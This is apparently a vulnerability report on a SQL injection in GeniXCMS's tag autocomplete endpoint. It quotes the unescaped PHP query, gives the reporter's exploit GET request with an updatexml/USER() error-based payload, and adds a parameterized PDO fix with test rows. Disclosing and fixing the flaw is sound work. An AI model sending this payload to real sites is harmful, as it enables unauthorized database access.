if (isset($_GET['token']) && Token::isExist($_GET['token'])) {
    if (User::access(2)) {
        // $_GET['term'] is concatenated into the SQL string without escaping
        $tags = Db::result(
            "SELECT * FROM `cat` WHERE `type` = 'tag' AND `name` LIKE '".$_GET['term']."%' ORDER BY `name` ASC"
        );
/inc/lib/Control/Ajax/tags-ajax.control.php
I think you know this.
but it needs editor.
this is my exp:
GET /code-src/GeniXCMS/GeniXCMS-master/?ajax=tags&token=vv4lHNZit2KJUJEIqUKn3S1CRvr5Wb8smp6ir3ujyj7iijC6t0GvfpLgSW0a3xGicHSXTH6IW1BCeUlt&term=a'%20and%20updatexml(1,(select+USER()),1)%23
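
A parameterized form of the tag lookup reported above, as an added example that is not GeniXCMS code or part of the original issue. It assumes PDO rather than the project's `Db` wrapper, uses an in-memory SQLite table of constructed rows in place of `cat`, and `findTags` is a hypothetical name.

```php
<?php
// Added example. Assumptions: PDO instead of the project's Db wrapper, and an
// in-memory SQLite table of constructed rows standing in for `cat`.

function findTags(PDO $pdo, string $term): array
{
    // LIKE metacharacters in user input are escaped so "%" or "_" match
    // literally; "!" is the escape character declared in the query.
    $escaped = strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);

    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $pdo->prepare(
        "SELECT * FROM `cat` WHERE `type` = 'tag' "
        . "AND `name` LIKE :term ESCAPE '!' ORDER BY `name` ASC"
    );
    $stmt->execute([':term' => $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE `cat` (`id` INTEGER PRIMARY KEY, `name` TEXT, `type` TEXT)");

// Constructed sample rows.
$insert = $pdo->prepare("INSERT INTO `cat` (`name`, `type`) VALUES (?, ?)");
foreach ([['alpha', 'tag'], ['apple', 'tag'], ['a%b', 'tag'], ['beta', 'tag'], ['about', 'category']] as $row) {
    $insert->execute($row);
}

$inputs = [
    'a',                                        // ordinary autocomplete prefix
    '%',                                        // wildcard typed by the user
    "a' and updatexml(1,(select USER()),1)#",   // the term from the report, URL-decoded
];
foreach ($inputs as $term) {
    $names = array_column(findTags($pdo, $term), 'name');
    printf("%-45s => [%s]\n", var_export($term, true), implode(', ', $names));
}
```

With the value bound as a parameter, the reported term is compared as a literal prefix and matches no tag; the database never parses it as SQL.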